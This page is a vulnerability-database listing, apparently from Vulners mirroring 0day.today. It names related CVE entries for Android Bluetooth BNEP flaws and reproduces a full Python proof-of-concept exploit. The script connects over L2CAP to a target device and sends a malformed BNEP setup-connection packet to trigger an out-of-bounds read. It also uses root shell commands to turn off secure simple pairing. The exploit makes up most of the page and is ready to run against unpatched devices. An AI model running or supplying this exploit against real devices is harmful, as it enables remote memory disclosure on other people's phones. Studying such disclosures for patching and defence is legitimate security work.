Android Bluetooth BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read Exploi
Reporter | Title | Published | Views | Family All 20 |
---|---|---|---|---|
![]() | Android Bluetooth BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-Of-Bounds Read | 23 Mar 201800:00 | β | packetstorm |
![]() | Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure | 23 Mar 201800:00 | β | packetstorm |
![]() | Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure Exploit | 23 Mar 201800:00 | β | zdt |
![]() | Out-of-bounds | 4 Apr 201817:29 | β | prion |
![]() | Out-of-bounds | 4 Apr 201817:29 | β | prion |
![]() | Out-of-bounds | 4 Apr 201817:29 | β | prion |
![]() | Out-of-bounds | 4 Apr 201817:29 | β | prion |
![]() | CVE-2017-13258 | 4 Apr 201817:29 | β | cve |
![]() | CVE-2017-13262 | 4 Apr 201817:29 | β | cve |
![]() | CVE-2017-13260 | 4 Apr 201817:29 | β | cve |
import os
import sys
import struct
import bluetooth
BNEP_PSM = 15
BNEP_FRAME_CONTROL = 0x01
# Control types (parsed by bnep_process_control_packet() in bnep_utils.cc)
BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01
def oob_read(src_bdaddr, dst):
bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bnep.settimeout(5)
bnep.bind((src_bdaddr, 0))
print 'Connecting to BNEP...'
bnep.connect((dst, BNEP_PSM))
bnep.settimeout(1)
print "Triggering OOB read (you may need a debugger to verify that it's actually happening)..."
# This crafted BNEP packet just contains the BNEP_FRAME_CONTROL frame type,
# plus the BNEP_SETUP_CONNECTION_REQUEST_MSG control type.
# It doesn't include the 'len' field, therefore it is read from out of bounds
bnep.send(struct.pack('<BB', BNEP_FRAME_CONTROL, BNEP_SETUP_CONNECTION_REQUEST_MSG))
try:
data = bnep.recv(3)
except bluetooth.btcommon.BluetoothError:
data = ''
if data:
print '%r' % data
else:
print '[No data]'
print 'Closing connection.'
bnep.close()
def main(src_hci, dst):
os.system('hciconfig %s sspmode 0' % (src_hci,))
os.system('hcitool dc %s' % (dst,))
oob_read(src_hci, dst)
if __name__ == '__main__':
if len(sys.argv) < 3:
print('Usage: python bnep02.py <src-bdaddr> <dst-bdaddr>')
else:
if os.getuid():
print 'Error: This script must be run as root.'
else:
main(sys.argv[1], sys.argv[2])
# 0day.today [2018-04-11] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo